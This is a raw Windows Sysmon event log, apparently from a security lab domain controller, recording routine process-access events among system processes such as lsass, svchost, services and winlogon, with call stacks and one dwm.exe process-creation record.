13:33:58.549{59A5CD1D-8E46-6005-0E00-00000000A301}10801320C:\Windows\system32\LogonUI.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0A00-00000000A301}8481104C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0800-00000000A301}720736C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0900-00000000A301}7961068C:\Windows\system32\winlogon.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.552{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{59A5CD1D-8E46-6005-A6C5-000000000000}0xc5a61SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000834Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000833Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000832Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.549{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000831Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0A00-00000000A301}848944C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000830Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000829Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000828Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000827Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000826Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000825Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0A00-00000000A301}8481220C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000824Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0A00-00000000A301}8481220C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1000-00000000A301}1164C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000823Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:58.533{59A5CD1D-8E44-6005-0A00-00000000A301}8481208C:\Windows\system32\services.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000822Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 